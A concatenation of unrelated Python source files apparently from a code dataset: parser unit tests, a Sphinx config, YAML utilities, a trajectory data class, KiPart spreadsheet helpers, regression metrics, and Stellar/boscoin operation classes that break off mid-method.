        assert subj.id == 1, "Unit has an id of 1"
        assert subj.number == 2, "Unit has two units"
    def test_simple_range_padded(self):
        subj = parse_unit_number("1- 2 ")
        assert subj.id == 1, "Unit has an id of 1"
        assert subj.number == 2, "Unit has two units"
    def test_range_unit_number(self):
        subj = parse_unit_number("1-50")
        assert subj.id == 1, "Unit has an id of 1"
        assert subj.number == 50, "Unit has 50 units"
    def test_range_unit_number_shifted(self):
        subj = parse_unit_number("50-99")
        assert subj.id == 50, "Unit has an id of 50"
        assert subj.number == 50, "Unit has 50 units"
        assert subj.alias == None, "Unit has no alias"
    # Aliases
    def test_single_has_alias(self):
        subj = parse_unit_number("1a")
        assert subj.id == 1, "Unit has an id of 1"
        assert subj.number == 1, "Unit has 1 unit"
        assert subj.alias == "A", "Unit has alias of A"
    def test_single_has_alias_prepend(self):
        subj = parse_unit_number("WT1")
        assert subj.id == 1, "Unit has an id of 1"
        assert subj.number == 1, "Unit has 1 unit"
        assert subj.alias == "WT", "Unit has alias of WT"
    def test_single_long_alias(self):
        subj = parse_unit_number("WKIEWA1")
        assert subj.id == 1, "Unit has an id of 1"
        assert subj.number == 1, "Unit has 1 unit"
        assert subj.alias == "WKIEWA", "Unit has alias of WKIEWA"
    def test_single_has_alias_prepend_space(self):
        subj = parse_unit_number("WT 1")
        assert subj.id == 1, "Unit has an id of 1"
        assert subj.number == 1, "Unit has 1 unit"
        assert subj.alias == "WT", "Unit has alias of WT"
    def test_range_has_alias(self):
        subj = parse_unit_number("1-2a")
        assert subj.id == 1, "Unit has an id of 1"
        assert subj.number == 2, "Unit has 2 unit"
        assert subj.alias == "A", "Unit has alias of A"
    def test_range_has_alias_prepend(self):
        subj = parse_unit_number("WT1-2")
        assert subj.id == 1, "Unit has an id of 1"
        assert subj.number == 2, "Unit has 2 unit"
        assert subj.alias == "WT", "Unit has alias of WT"
    def test_range_has_alias_prepend_space(self):
        subj = parse_unit_number("WT 1-2")
        assert subj.id == 1, "Unit has an id of 1"
        assert subj.number == 2, "Unit has 2 unit"
        assert subj.alias == "WT", "Unit has alias of WT"
    # Force single
    def test_force_single(self):
        subj = parse_unit_number("GT 1-2", force_single=True)
        assert subj.id == 2, "Unit has an id of 2"
        assert subj.number == 1, "Unit has 1 unit"
        assert subj.alias == "GT1", "Unit has alias of GT1"
    # Multi units in one line
    def test_ampersand(self):
        subj = parse_unit_number("1 & 2")
        assert subj.id == 1, "Unit has an id of 1"
        assert subj.number == 2, "Unit has 2 units"
        assert subj.alias == None, "Unit has no alias"
    def test_ampersand_three(self):
        subj = parse_unit_number("1 & 2 & 3")
        assert subj.id == 1, "Unit has an id of 1"
        assert subj.number == 3, "Unit has 3 units"
        assert subj.alias == None, "Unit has no alias"
    def test_comma_separated(self):
        subj = parse_unit_number("1,2")
        assert subj.id == 1, "Unit has an id of 1"
        assert subj.number == 2, "Unit has 2 units"
        assert subj.alias == None, "Unit has no alias"
    def test_comma_separated_single(self):
        subj = parse_unit_number("GT 1-2,GT 1-4", force_single=True)
        assert subj.id == 2, "Unit has an id of 1"
        assert subj.number == 2, "Unit has 2 units"
        assert subj.alias == "GT1", "Unit has GT1 alias"
    def test_comma_and_ampersand_separated(self):
        subj = parse_unit_number("1, 2 & 5,3 & 4")
        assert subj.id == 1, "Unit has an id of 1"
        assert subj.number == 5, "Unit has 5 units"
        assert subj.alias == None, "Unit has no alias"
class TestUnitDuidParser(object):
    """Unit tests for parse_unit_duid(), which parses a unit string in the
    context of a station DUID."""
    def test_unit_duid(self):
        subj = parse_unit_duid("WT1-2", "NONE")
        assert subj.id == 1, "Unit has an id of 1"
        assert subj.number == 2, "Unit has 2 unit"
        assert subj.alias == "WT", "Unit has alias of WT"
    def test_unit_duid_single(self):
        # For this station the parser is expected to force a single unit.
        subj = parse_unit_duid("GT 1-2", "AGLHAL")
        assert subj.id == 2, "Unit has an id of 2"
        assert subj.number == 1, "Unit has 1 unit"
        assert subj.alias == "GT1", "Unit has alias of GT1"
| 2.8125 | 3 |
docs/conf.py | tino/cairocffi | 0 | 12761506 | import re
import os
# Sphinx configuration for the cairocffi documentation build.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx',
              'sphinx.ext.coverage']
master_doc = 'index'
project = 'cairocffi'
copyright = '2013, <NAME>'
# Scrape the release string from cairocffi/__init__.py so the docs never
# drift from the package version.
# NOTE(review): the file handle opened here is never closed — harmless for a
# one-shot Sphinx run, but a context manager would be cleaner.
release = re.search(
    "VERSION = '([^']+)'",
    open(os.path.join(os.path.dirname(__file__), os.pardir,
                      'cairocffi', '__init__.py')).read().strip()).group(1)
# Short X.Y version derived from the full release string.
version = '.'.join(release.split('.')[:2])
exclude_patterns = ['_build']
autodoc_member_order = 'bysource'
autodoc_default_flags = ['members']
# Cross-link the Python and pycairo object inventories.
intersphinx_mapping = {
    'http://docs.python.org/': None,
    'http://cairographics.org/documentation/pycairo/2/': None}
| 1.59375 | 2 |
analysis/rulebased/utils.py | VaCH2/tosca-analysis | 0 | 12761507 | <reponame>VaCH2/tosca-analysis<gh_stars>0
import os
def get_yaml_files(path):
    """Recursively collect the paths of all YAML (.yaml/.yml) files under *path*."""
    yaml_suffixes = ('.yaml', '.yml')
    found = []
    for entry_name in os.listdir(path):
        full_path = os.path.join(path, entry_name)
        if os.path.isdir(full_path):
            # Descend into subdirectories and merge their results.
            found += get_yaml_files(full_path)
        elif full_path.endswith(yaml_suffixes):
            found.append(full_path)
    return found
def keyValueList(d):
    """Flatten *d* into a list of (key, value) tuples.

    Recurses into nested dicts and into dicts held inside lists; pairs whose
    key or value is None are skipped. Anything that is neither a dict nor a
    list yields an empty list.
    """
    if isinstance(d, list):
        pairs = []
        for item in d:
            # Only dict entries of a list are inspected; other entries
            # (including nested lists) are ignored.
            if isinstance(item, dict):
                pairs += keyValueList(item)
        return pairs
    if not isinstance(d, dict):
        return []
    pairs = []
    for key, value in d.items():
        if key is not None and value is not None:
            pairs.append((key, value))
            pairs += keyValueList(value)
    return pairs
def calculate_depth(f):
    """Pair each line of the iterable *f* with its indentation depth.

    Depth 0 is the top level; a line indented further than its predecessor
    opens a new level, and dedenting pops back through the indent stack.
    Returns a list of (stripped_content, depth) tuples.
    (Adapted from https://stackoverflow.com/questions/45964731)
    """
    indent_stack = [0]
    depth = 0
    annotated = []
    for raw in f:
        raw = raw[:-1]                     # drop the trailing newline
        content = raw.strip()
        indent = len(raw) - len(content)
        if indent > indent_stack[-1]:
            depth += 1
            indent_stack.append(indent)
        else:
            # Dedent: pop levels until the stack top is <= this indent.
            while indent < indent_stack[-1]:
                depth -= 1
                indent_stack.pop()
        annotated.append((content, depth))
    return annotated
data_obj.py | justinfocus12/SHORT | 1 | 12761508 | <gh_stars>1-10
# This is where the Data object lives
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
matplotlib.use('pdf')
matplotlib.rcParams['font.size'] = 17
matplotlib.rcParams['font.family'] = 'serif'
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
def fmt(num, pos):
    """Matplotlib tick formatter: render *num* in scientific notation with
    one decimal place (*pos* is required by the formatter API but unused)."""
    return format(num, '.1e')
def both_grids(bounds, shp):
    """Build cell-center and cell-edge grids for a rectangular domain.

    Parameters
    ----------
    bounds : (d, 2) array of [lower, upper] per dimension.
    shp : length-d integer array; the code treats it as the number of grid
        points (edges) per dimension, giving shp - 1 cells per dimension.
        (The original comment called it "the number of cells" — that
        contradicts the arithmetic below.)

    Returns
    -------
    center_grid : (prod(shp - 1), d) array of cell-center coordinates.
    edge_grid : (prod(shp), d) array of cell-edge coordinates.
    dx : length-d array of cell widths.
    """
    Nc = np.prod(shp - 1)  # Number of centers
    # Bug fix: this assignment had been swallowed into the comment on the
    # previous line, leaving Ne undefined (NameError at the edge_grid line).
    Ne = np.prod(shp)      # Number of edges
    center_grid = np.array(np.unravel_index(np.arange(Nc), shp - 1)).T
    edge_grid = np.array(np.unravel_index(np.arange(Ne), shp)).T
    dx = (bounds[:, 1] - bounds[:, 0]) / (shp - 1)
    center_grid = bounds[:, 0] + dx * (center_grid + 0.5)
    edge_grid = bounds[:, 0] + dx * edge_grid
    return center_grid, edge_grid, dx
class Data:
    """Ensemble of short trajectories subsampled at a fixed set of lag times.

    X has shape (nshort, traj_length, xdim): X[:, i, :] is the ensemble
    state at the i-th requested lag time, and t_x[i] is the actual sample
    time used (the nearest available time on the raw time grid).

    Fix: insert_boundaries_fwd/_bwd called sys.exit() although this module
    never imported sys (NameError on the guard path); the two methods now
    import sys locally. Large blocks of dead, commented-out code were also
    removed.
    """
    def __init__(self, x_short, t_short, lag_time_seq):
        """Subsample x_short (shape (Nt, nshort, xdim), sampled at times
        t_short) at the times in lag_time_seq, each snapped to the nearest
        entry of t_short."""
        Nt, self.nshort, self.xdim = x_short.shape
        self.traj_length = len(lag_time_seq)
        self.X = np.zeros((self.nshort, self.traj_length, self.xdim))
        self.t_x = np.zeros(self.traj_length)
        time_indices = np.zeros(self.traj_length, dtype=int)
        for i in range(self.traj_length):
            # Nearest available sample to the requested lag time.
            time_indices[i] = np.argmin(np.abs(t_short - lag_time_seq[i]))
            self.X[:, i, :] = x_short[time_indices[i]]
            self.t_x[i] = t_short[time_indices[i]]
        return
    def concatenate_data(self, other):
        """Fold another dataset's trajectories into this one along the
        ensemble axis. Assumes the time grids match — TODO confirm callers
        guarantee this."""
        self.X = np.concatenate((self.X, other.X), axis=0)
        self.nshort += other.nshort
        return
    def insert_boundaries(self, bdy_dist, lag_time_max=None):
        """Record boundary crossing indices per trajectory.

        bdy_dist maps an (n, xdim) array of states to n distances that are
        zero exactly on the boundary. Sets last_entry_idx (last time index,
        below the final one, at which each trajectory sat on the boundary),
        first_exit_idx (earliest positive time index on the boundary, else
        ti_max) and last_idx (all ti_max), scanning up to lag_time_max.
        """
        if lag_time_max is None:
            lag_time_max = self.t_x[-1]
        # NOTE(review): this full-array evaluation is not used below (the
        # loop re-evaluates bdy_dist per time slice); kept for parity with
        # the original.
        bdy_dist_x = bdy_dist(self.X.reshape((self.nshort * self.traj_length, self.xdim))).reshape((self.nshort, self.traj_length))
        self.last_entry_idx = np.zeros(self.nshort, dtype=int)
        ti_max = np.argmin(np.abs(lag_time_max - self.t_x))
        self.last_idx = ti_max * np.ones(self.nshort, dtype=int)
        self.first_exit_idx = ti_max * np.ones(self.nshort, dtype=int)
        for i in range(ti_max):
            db = bdy_dist(self.X[:, i, :])
            bidx = np.where(db == 0)[0]
            if i < self.traj_length - 1:
                self.last_entry_idx[bidx] = i
            if i > 0:
                self.first_exit_idx[bidx] = np.minimum(self.first_exit_idx[bidx], i)
        return
    def insert_boundaries_fwd(self, bdy_dist_x, tmin, tmax):
        """Forward-in-time variant: given precomputed boundary distances
        bdy_dist_x of shape (nshort, traj_length), record the first time
        index in (tmin, tmax) at which each trajectory is on the boundary."""
        import sys  # local import: sys is not imported at module level
        if tmin > tmax:
            sys.exit("HEY! Make sure tmin < tmax in insert_boundaries_fwd")
        ti_min = np.argmin(np.abs(tmin - self.t_x))
        ti_max = np.argmin(np.abs(tmax - self.t_x))
        self.base_idx_fwd = ti_min * np.ones(self.nshort, dtype=int)
        self.first_exit_idx_fwd = ti_max * np.ones(self.nshort, dtype=int)
        self.last_idx_fwd = ti_max * np.ones(self.nshort, dtype=int)
        # Scan backwards so the earliest boundary hit wins.
        for i in np.arange(ti_max - 1, ti_min, -1):
            bidx = np.where(bdy_dist_x[:, i] == 0)[0]
            self.first_exit_idx_fwd[bidx] = i
        return
    def insert_boundaries_bwd(self, bdy_dist_x, tmax, tmin):
        """Backward-in-time variant: record the latest time index in
        (tmin, tmax) at which each trajectory is on the boundary."""
        import sys  # local import: sys is not imported at module level
        if tmin > tmax:
            sys.exit("HEY! Make sure tmax > tmin in insert_boundaries_bwd")
        ti_min = np.argmin(np.abs(tmin - self.t_x))
        ti_max = np.argmin(np.abs(tmax - self.t_x))
        self.base_idx_bwd = ti_max * np.ones(self.nshort, dtype=int)
        self.first_exit_idx_bwd = ti_min * np.ones(self.nshort, dtype=int)
        self.last_idx_bwd = ti_min * np.ones(self.nshort, dtype=int)
        # Scan forwards so the latest boundary hit wins.
        for i in np.arange(ti_min + 1, ti_max, 1):
            bidx = np.where(bdy_dist_x[:, i] == 0)[0]
            self.first_exit_idx_bwd[bidx] = i
        return
| 2.296875 | 2 |
kipart/common.py | xesscorp/KiPart | 133 | 12761509 | <gh_stars>100-1000
# MIT license
#
# Copyright (C) 2015-2021 by <NAME>.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import print_function
import csv
import difflib
import os.path
import re
from builtins import object
import openpyxl
from .py_2_3 import *
# Map of recognized spreadsheet column headers to their canonical field
# names (note the synonyms: 'pin' -> 'num', 'bank' -> 'unit').
COLUMN_NAMES = {
    "pin": "num",
    "num": "num",
    "name": "name",
    "type": "type",
    "style": "style",
    "side": "side",
    "unit": "unit",
    "bank": "unit",
    "hidden": "hidden",
    "": "",  # Blank column names stay blank.
}
# This is just a vanilla object class for device pins.
# We'll add attributes to it as needed.
class Pin(object):
    pass
# Prototype pin carrying the default value for every pin field.
DEFAULT_PIN = Pin()
DEFAULT_PIN.num = None
DEFAULT_PIN.name = ""
DEFAULT_PIN.type = "io"
DEFAULT_PIN.style = "line"
DEFAULT_PIN.unit = 1
DEFAULT_PIN.side = "left"
DEFAULT_PIN.hidden = "no"
def num_row_elements(row):
    """Count the DISTINCT non-blank entries in a CSV row.

    Returns 0 when *row* is not iterable/hashable (e.g. None).
    """
    try:
        distinct = set(row) - {""}
        return len(distinct)
    except TypeError:
        return 0
def get_nonblank_row(csv_reader):
    """Return the next row of *csv_reader* that has at least one non-blank
    element, or [] when none remain."""
    for candidate in csv_reader:
        if num_row_elements(candidate):
            return candidate
    return []
def get_part_info(csv_reader):
    """Read the part-header row of the CSV and return (part number,
    reference prefix, footprint, manufacturer number, datasheet link,
    description)."""
    # Pad the first non-blank row with None so unpacking six fields is safe.
    fields = (get_nonblank_row(csv_reader) + [None] * 6)[:6]
    (part_num, part_ref_prefix, part_footprint,
     part_manf_num, part_datasheet, part_desc) = fields
    # Fall back to the default reference prefix when none was given.
    if part_ref_prefix in (None, "", " "):
        part_ref_prefix = "U"
    # A part number that matches a column header means the part-number row
    # itself is missing from the file.
    if part_num and part_num.lower() in list(COLUMN_NAMES.keys()):
        issue("Row with part number is missing in CSV file.", "error")
    return (part_num, part_ref_prefix, part_footprint,
            part_manf_num, part_datasheet, part_desc)
def find_closest_match(name, name_dict, fuzzy_match, threshold=0.0):
    """Look up *name* in *name_dict*, optionally with fuzzy matching.

    The name is first lowercased and stripped of non-alphanumeric
    characters (and dots). With fuzzy matching disabled this is a plain
    dict lookup; otherwise the closest key above *threshold* is used.
    """
    cleaned = re.compile("[\W.]+").sub("", name).lower()
    if fuzzy_match == False:
        return name_dict[cleaned]
    # A threshold of 0 guarantees difflib always yields some candidate.
    best = difflib.get_close_matches(cleaned, list(name_dict.keys()), 1, threshold)[0]
    return name_dict[best]
def clean_headers(headers):
    """Map each raw header found in the file to its closest canonical
    column name via fuzzy matching."""
    return [find_closest_match(header, COLUMN_NAMES, True) for header in headers]
def issue(msg, level="warning"):
    """Report a problem. Warnings and plain messages go to stdout; level
    "error" prints and then raises an unrecoverable Exception."""
    if level == "error":
        print("ERROR: {}".format(msg))
        raise Exception("Unrecoverable error")
    if level == "warning":
        print("Warning: {}".format(msg))
    else:
        print(msg)
def fix_pin_data(pin_data, part_num):
    """Normalize a pin field: trim surrounding whitespace and replace any
    interior whitespace with underscores (emitting a warning when the
    replacement happens)."""
    fixed_pin_data = pin_data.strip()
    if re.search("\s", fixed_pin_data) is None:
        return fixed_pin_data
    fixed_pin_data = re.sub("\s", "_", fixed_pin_data)
    # The warning message interpolates the original pin_data via locals().
    issue(
        "Replaced whitespace with '_' in pin '{pin_data}' of part {part_num}.".format(**locals())
    )
    return fixed_pin_data
def is_xlsx(filename):
    """Return True when *filename* has an .xlsx extension."""
    _, extension = os.path.splitext(filename)
    return extension == ".xlsx"
def convert_xlsx_to_csv(xlsx_file, sheetname=None):
    """
    Convert a sheet of an Excel workbook into a CSV file and return an open
    read handle to it.

    NOTE(review): despite the original wording, the CSV is written to a
    fixed name in the current working directory, not "the same directory"
    as the workbook; the returned handle is never closed by this function.
    """
    wb = openpyxl.load_workbook(xlsx_file)
    # Use the named sheet when given, otherwise the workbook's active sheet.
    if sheetname:
        sh = wb[sheetname]
    else:
        sh = wb.active
    if USING_PYTHON2:
        # Python 2 doesn't accept newline parameter when opening file.
        newline = {}
    else:
        # kipart fails on Python 3 unless file is opened with this newline.
        newline = {"newline": ""}
    csv_filename = "xlsx_to_csv_file.csv"
    with open(csv_filename, "w", **newline) as f:
        col = csv.writer(f)
        for row in sh.rows:
            try:
                col.writerow([cell.value for cell in row])
            except UnicodeEncodeError:
                # Fallback: strip non-ASCII characters from every cell and
                # retry the row (Python 2 encoding path).
                for cell in row:
                    if cell.value:
                        cell.value = "".join([c for c in cell.value if ord(c) < 128])
                col.writerow([cell.value for cell in row])
    return open(csv_filename, "r")
| 2.03125 | 2 |
vnpy/app/realtime_monitor/ui/__init__.py | xyh888/vnpy | 5 | 12761510 | #!/usr/bin/python
# -*- coding:utf-8 -*-
"""
@author:Hadrianl
"""
from .widget import CandleChartWidget | 0.980469 | 1 |
webinterface/src/WebComponents/Sources/CurrentService.py | Mariusz1970/enigma2-plugins-1 | 41 | 12761511 | from Components.Sources.Source import Source
class CurrentService(Source):
    """Source exposing the currently playing service reference as text."""

    def __init__(self, session):
        Source.__init__(self)
        self.session = session

    def command(self):
        # "N/A" when nothing is currently playing.
        service_ref = self.session.nav.getCurrentlyPlayingServiceReference()
        return service_ref.toString() if service_ref is not None else "N/A"

    text = property(command)
| 2.34375 | 2 |
tests/test_utilities_table_utilities.py | Kokitis/pyregions | 0 | 12761512 | from pyregions.utilities import table_utilities
import pytest
@pytest.mark.parametrize(
    "columns,expected",
    [
        (['abc', '123', 456], ['123',456]),
        (["13.4", 'aslkjnsf12312ll'], ['13.4'])
    ]
)
def test_get_numeric_columns(columns, expected):
    """get_numeric_columns keeps only entries that parse as numbers
    (numeric strings and real numbers alike)."""
    result = table_utilities.get_numeric_columns(columns)
    assert result == expected
@pytest.mark.parametrize(
    "value,expected",
    [
        ("abc.tsv", '\t'),
        ("assssdawrfa.csv", ','),
        ("a.tab", "\t")
    ]
)
def test_get_delimiter(value, expected):
    """_get_delimiter infers the field separator from the file extension:
    tab for .tsv/.tab, comma for .csv."""
    assert table_utilities._get_delimiter(value) == expected
analysis-master/tra_analysis/RegressionMetric.py | titanscouting/tra-analysis | 2 | 12761513 | <filename>analysis-master/tra_analysis/RegressionMetric.py
# Titan Robotics Team 2022: RegressionMetric submodule
# Written by <NAME>
# Notes:
# this should be imported as a python module using 'from tra_analysis import RegressionMetric'
# setup:
__version__ = "1.0.0"
__changelog__ = """changelog:
1.0.0:
- ported analysis.RegressionMetric() here
"""
__author__ = (
"<NAME> <<EMAIL>>",
)
__all__ = [
'RegressionMetric'
]
import numpy as np
import sklearn
from sklearn import metrics
class RegressionMetric():
    """Compute (r^2, MSE, RMSE) for a prediction/target pair.

    Unusual pattern preserved from the original: "instantiating" this class
    returns a plain 3-tuple of metrics (via __new__), and the helper methods
    are invoked with the class itself in the self slot.
    """
    def __new__(cls, predictions, targets):
        r2 = cls.r_squared(cls, predictions, targets)
        mean_sq = cls.mse(cls, predictions, targets)
        root_mean_sq = cls.rms(cls, predictions, targets)
        return r2, mean_sq, root_mean_sq
    def r_squared(self, predictions, targets):
        # Coefficient of determination; assumes equal-size inputs.
        return sklearn.metrics.r2_score(targets, predictions)
    def mse(self, predictions, targets):
        # Mean squared error.
        return sklearn.metrics.mean_squared_error(targets, predictions)
    def rms(self, predictions, targets):
        # Root mean squared error.
        return np.sqrt(sklearn.metrics.mean_squared_error(targets, predictions))
boscoin_base/operation.py | jinhwanlazy/py-boscoin-base | 4 | 12761514 | # coding: utf-8
import base64
from decimal import *
from .asset import Asset
from .stellarxdr import Xdr
from .utils import account_xdr_object, signer_key_xdr_object, encode_check, best_rational_approximation as best_r, division, decode_check
from .utils import XdrLengthError, DecodeError
ONE = Decimal(10 ** 7)
class Operation(object):
    """Base class for operations submitted to the network.

    Each subclass builds its own XDR body; the optional 'source' account in
    *opts* may be None, in which case the transaction's source is used.
    """
    def __init__(self, opts):
        # opts must be a dict of operation parameters.
        assert type(opts) is dict
        self.source = opts.get('source')
        self.body = Xdr.nullclass()
    def __eq__(self, other):
        # Two operations are equal when their XDR encodings match.
        # NOTE(review): __eq__ is defined without __hash__, so instances
        # become unhashable in Python 3 — confirm that is intended.
        return self.xdr() == other.xdr()
    def to_xdr_object(self):
        # account_xdr_object raises TypeError for a None source, which maps
        # to an empty (absent) optional source account in the XDR union.
        try:
            source_account = [account_xdr_object(self.source)]
        except TypeError:
            source_account = []
        return Xdr.types.Operation(source_account, self.body)
    def xdr(self):
        """Serialize this operation to base64-encoded XDR bytes."""
        op = Xdr.StellarXDRPacker()
        op.pack_Operation(self.to_xdr_object())
        return base64.b64encode(op.get_buffer())
    @staticmethod
    def to_xdr_amount(value):
        """Convert a decimal amount string to its int64 on-ledger value."""
        if not isinstance(value, str):
            raise Exception("value must be a string")
        # throw exception if value * ONE has decimal places (it can't be represented as int64)
        return int((Decimal(value) * ONE).to_integral_exact(context=Context(traps=[Inexact])))
    @staticmethod
    def from_xdr_amount(value):
        """Convert an int64 on-ledger value back to a decimal amount string."""
        return str(Decimal(value) / ONE)
    @classmethod
    def from_xdr(cls, xdr):
        """Decode a base64 XDR blob and dispatch to the matching subclass."""
        xdr_decode = base64.b64decode(xdr)
        op = Xdr.StellarXDRUnpacker(xdr_decode)
        op = op.unpack_Operation()
        if op.type == Xdr.const.CREATE_ACCOUNT:
            return CreateAccount.from_xdr_object(op)
        elif op.type == Xdr.const.PAYMENT:
            return Payment.from_xdr_object(op)
        elif op.type == Xdr.const.PATH_PAYMENT:
            return PathPayment.from_xdr_object(op)
        elif op.type == Xdr.const.CHANGE_TRUST:
            return ChangeTrust.from_xdr_object(op)
        elif op.type == Xdr.const.ALLOW_TRUST:
            return AllowTrust.from_xdr_object(op)
        elif op.type == Xdr.const.SET_OPTIONS:
            return SetOptions.from_xdr_object(op)
        elif op.type == Xdr.const.MANAGE_OFFER:
            return ManageOffer.from_xdr_object(op)
        elif op.type == Xdr.const.CREATE_PASSIVE_OFFER:
            return CreatePassiveOffer.from_xdr_object(op)
        elif op.type == Xdr.const.ACCOUNT_MERGE:
            return AccountMerge.from_xdr_object(op)
        elif op.type == Xdr.const.INFLATION:
            return Inflation.from_xdr_object(op)
        elif op.type == Xdr.const.MANAGE_DATA:
            return ManageData.from_xdr_object(op)
class CreateAccount(Operation):
    """Create-account operation: funds *destination* with *starting_balance*."""
    def __init__(self, opts):
        super(CreateAccount, self).__init__(opts)
        self.destination = opts.get('destination')
        self.starting_balance = opts.get('starting_balance')
    def to_xdr_object(self):
        # Build the CreateAccountOp body, then let the base class wrap it.
        op = Xdr.types.CreateAccountOp(
            account_xdr_object(self.destination),
            Operation.to_xdr_amount(self.starting_balance),
        )
        self.body.type = Xdr.const.CREATE_ACCOUNT
        self.body.createAccountOp = op
        return super(CreateAccount, self).to_xdr_object()
    @classmethod
    def from_xdr_object(cls, op_xdr_object):
        """Rebuild a CreateAccount operation from its unpacked XDR object."""
        source_accounts = op_xdr_object.sourceAccount
        source = (
            encode_check('account', source_accounts[0].ed25519).decode()
            if source_accounts else None
        )
        create_op = op_xdr_object.body.createAccountOp
        destination = encode_check('account', create_op.destination.ed25519).decode()
        starting_balance = Operation.from_xdr_amount(create_op.startingBalance)
        return cls({
            'source': source,
            'destination': destination,
            'starting_balance': starting_balance,
        })
class Payment(Operation):
    """Payment operation: send *amount* of *asset* to *destination*."""
    def __init__(self, opts):
        super(Payment, self).__init__(opts)
        self.destination = opts.get('destination')
        self.asset = opts.get('asset')
        self.amount = opts.get('amount')
    def to_xdr_object(self):
        # Build the PaymentOp body, then let the base class wrap it.
        asset = self.asset.to_xdr_object()
        destination = account_xdr_object(self.destination)
        amount = Operation.to_xdr_amount(self.amount)
        payment_op = Xdr.types.PaymentOp(destination, asset, amount)
        self.body.type = Xdr.const.PAYMENT
        self.body.paymentOp = payment_op
        return super(Payment, self).to_xdr_object()
    @classmethod
    def from_xdr_object(cls, op_xdr_object):
        """Rebuild a Payment operation from its unpacked XDR object."""
        # An absent source account list means the op uses the tx source.
        if not op_xdr_object.sourceAccount:
            source = None
        else:
            source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
        destination = encode_check('account', op_xdr_object.body.paymentOp.destination.ed25519).decode()
        asset = Asset.from_xdr_object(op_xdr_object.body.paymentOp.asset)
        amount = Operation.from_xdr_amount(op_xdr_object.body.paymentOp.amount)
        return cls({
            'source': source,
            'destination': destination,
            'asset': asset,
            'amount': amount,
        })
class PathPayment(Operation):
    """Path-payment operation: send up to *send_max* of *send_asset*,
    converted along *path*, so *destination* receives *dest_amount* of
    *dest_asset*."""
    def __init__(self, opts):
        super(PathPayment, self).__init__(opts)
        self.destination = opts.get('destination')
        self.send_asset = opts.get('send_asset')
        self.send_max = opts.get('send_max')
        self.dest_asset = opts.get('dest_asset')
        self.dest_amount = opts.get('dest_amount')
        self.path = opts.get('path') # a list of paths/assets
    def to_xdr_object(self):
        # Build the PathPaymentOp body, then let the base class wrap it.
        destination = account_xdr_object(self.destination)
        send_asset = self.send_asset.to_xdr_object()
        dest_asset = self.dest_asset.to_xdr_object()
        path_payment = Xdr.types.PathPaymentOp(send_asset, Operation.to_xdr_amount(self.send_max), destination,
                                               dest_asset, Operation.to_xdr_amount(self.dest_amount), self.path)
        self.body.type = Xdr.const.PATH_PAYMENT
        self.body.pathPaymentOp = path_payment
        return super(PathPayment, self).to_xdr_object()
    @classmethod
    def from_xdr_object(cls, op_xdr_object):
        """Rebuild a PathPayment operation from its unpacked XDR object."""
        # An absent source account list means the op uses the tx source.
        if not op_xdr_object.sourceAccount:
            source = None
        else:
            source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
        destination = encode_check('account', op_xdr_object.body.pathPaymentOp.destination.ed25519).decode()
        send_asset = Asset.from_xdr_object(op_xdr_object.body.pathPaymentOp.sendAsset)
        dest_asset = Asset.from_xdr_object(op_xdr_object.body.pathPaymentOp.destAsset)
        send_max = Operation.from_xdr_amount(op_xdr_object.body.pathPaymentOp.sendMax)
        dest_amount = Operation.from_xdr_amount(op_xdr_object.body.pathPaymentOp.destAmount)
        # Decode each intermediate hop asset of the conversion path.
        path = []
        if op_xdr_object.body.pathPaymentOp.path:
            for x in op_xdr_object.body.pathPaymentOp.path:
                path.append(Asset.from_xdr_object(x))
        return cls({
            'source': source,
            'destination': destination,
            'send_asset': send_asset,
            'send_max': send_max,
            'dest_asset': dest_asset,
            'dest_amount': dest_amount,
            'path': path
        })
class ChangeTrust(Operation):
    """Creates, updates, or deletes a trustline for ``asset``.

    ``limit`` defaults to the maximum representable amount, which
    effectively means "no limit".
    """
    def __init__(self, opts):
        super(ChangeTrust, self).__init__(opts)
        self.line = opts.get('asset')
        if opts.get('limit') is not None:
            self.limit = opts.get('limit')
        else:
            # Max int64 stroops expressed as an amount string: no effective limit.
            self.limit = "922337203685.4775807"
    def to_xdr_object(self):
        """Serialize this operation into its XDR representation."""
        line = self.line.to_xdr_object()
        limit = Operation.to_xdr_amount(self.limit)
        change_trust_op = Xdr.types.ChangeTrustOp(line, limit)
        self.body.type = Xdr.const.CHANGE_TRUST
        self.body.changeTrustOp = change_trust_op
        return super(ChangeTrust, self).to_xdr_object()
    @classmethod
    def from_xdr_object(cls, op_xdr_object):
        """Rebuild a ChangeTrust from its XDR object form."""
        if not op_xdr_object.sourceAccount:
            source = None
        else:
            source = encode_check('account', op_xdr_object.sourceAccount[0].ed25519).decode()
        line = Asset.from_xdr_object(op_xdr_object.body.changeTrustOp.line)
        # Removed leftover debug print(line) that polluted stdout on every decode.
        limit = Operation.from_xdr_amount(op_xdr_object.body.changeTrustOp.limit)
        return cls({
            'source': source,
            'asset': line,
            'limit': limit
        })
class AllowTrust(Operation):
    """Authorizes (or de-authorizes) ``trustor`` to hold the source
    account's asset identified by ``asset_code``.
    """
    def __init__(self, opts):
        super(AllowTrust, self).__init__(opts)
        self.trustor = opts.get('trustor')
        self.asset_code = opts.get('asset_code')
        self.authorize = opts.get('authorize')
    def to_xdr_object(self):
        """Serialize this operation into its XDR representation.

        Asset codes are zero-padded to either 4 or 12 bytes, matching the
        two XDR alphanum variants.
        """
        trustor = account_xdr_object(self.trustor)
        length = len(self.asset_code)
        assert length <= 12
        # Pad short codes to 4 bytes, longer ones to 12 bytes.
